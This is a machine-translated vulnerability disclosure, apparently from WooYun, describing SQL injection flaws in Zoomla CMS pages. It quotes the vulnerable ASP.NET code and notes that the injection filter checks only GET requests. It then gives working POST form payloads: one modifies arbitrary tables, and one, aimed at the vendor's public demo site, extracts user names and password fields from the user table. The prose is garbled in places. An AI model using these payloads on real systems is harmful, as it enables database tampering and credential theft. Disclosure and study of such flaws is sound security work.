Traffic-driven CMS2 files, two injections, five problem codes, and other injection bypass Methods

Traffic-driven CMS2 files, two injections, five problem codes, and other injection bypass Methods
The vendor has made great efforts in security. Although many parameters and data type conversion are involved, there will inevitably be omissions. We hope to continue our efforts to inject the file User/UserZone/StructView. aspx parameter: ID background code snippet:

public void Page_list()    {       .....        DataTable dataTable = this.user.Sel("StructureID like '%," + base.Request.QueryString["ID"] + ",%'", "");        .......    }

It can be determined that this ID parameter is the anti-injection adjustment before the value is passed through the URL. Then, we can bypass it in another way.

Private void Application_BeginRequest (object sender, EventArgs e) {if (base. request. requestType. toUpper () = "GET" & ZoomlaSecurityCenter. getData () {function. writeMessage ("possible cause: the parameters you submitted are incorrect, contain malicious strings, or check whether the system has enabled the SQL anti-injection function! "," "," Illegal SQL injection or storage! ");} If (base. request. httpMethod. toUpper () = "POST" & HttpContext. current. request. files. count> 0) {ZoomlaSecurityCenter. checkUpladFiles ();}....}

It can be concluded that the SQL Injection defense only filters the GET method and the POST YY method is as follows:

<form action="http://192.168.10.55:9992/User/UserZone/StructView.aspx?ID=SA';update ZL_3DMusic set MusicName='wooyun' where id=1 and ',%'='" method="post"> <input id="Submit1" type="submit" value="submit" /> </form>

Here, you can modify any table. Here, the field MusicName of ZL_3DMusic is tested as wooyun. Note: This injection point has been deleted in the Demo on the official website, however, the download provided by the official website still contains the following content:/User/userzone/logmanage/logsearchresult. aspx code snippet: The problem occurs in the page background method. In this method, the OK _Click () parameter of the small gnome 1 function name is used.

string text2 = base.Request.Form["age1"];        string text3 = base.Request.Form["age2"];        string text4 = base.Request.Form["sex"];        string text5 = base.Request.Form["ltype"];

Problem code 1 text = text + "and userSex =" + text4; problem Code 2 if (text5! = "") {Text = text + "and logtypeid = '" + text5 + "'";}

In this method, the OK2_Click () parameter of the little gnome 2 function name is:

string text2 = base.Request.Form["sType"];string text3 = base.Request.Form["TypeStr"];

 

Problem code: Problem code 1

If (! String. IsNullOrEmpty (text3) {text = text + "and username = '" + text3.Trim () + "'";} problem code 2if (! String. IsNullOrEmpty (text3) {text = text + "and LogTitle = '" + text3.Trim () + "'";}

 

Code:

<form action="http://demo.zoomla.cn/User/userzone/logmanage/logsearchresult.aspx" method="post"> <input type="text" name="age1" id="age1" value="1" /> <input type="text" name="age2" id="age2" value="1" /> <input type="text" name="sex" id="sex" value="1" /> <input type="text" name="ltype" id="ltype" value="6F9619FF-8B86-D011-B42D-00C04FC964FF' and 1=( select top 1 STUFF( UserPwd, 1, 0, UserName) from dbo.ZL_User )--" /> <input id="Submit1" type="submit" value="submit" /> </form>

 

Solution: the filter is not in place and the POST is filtered.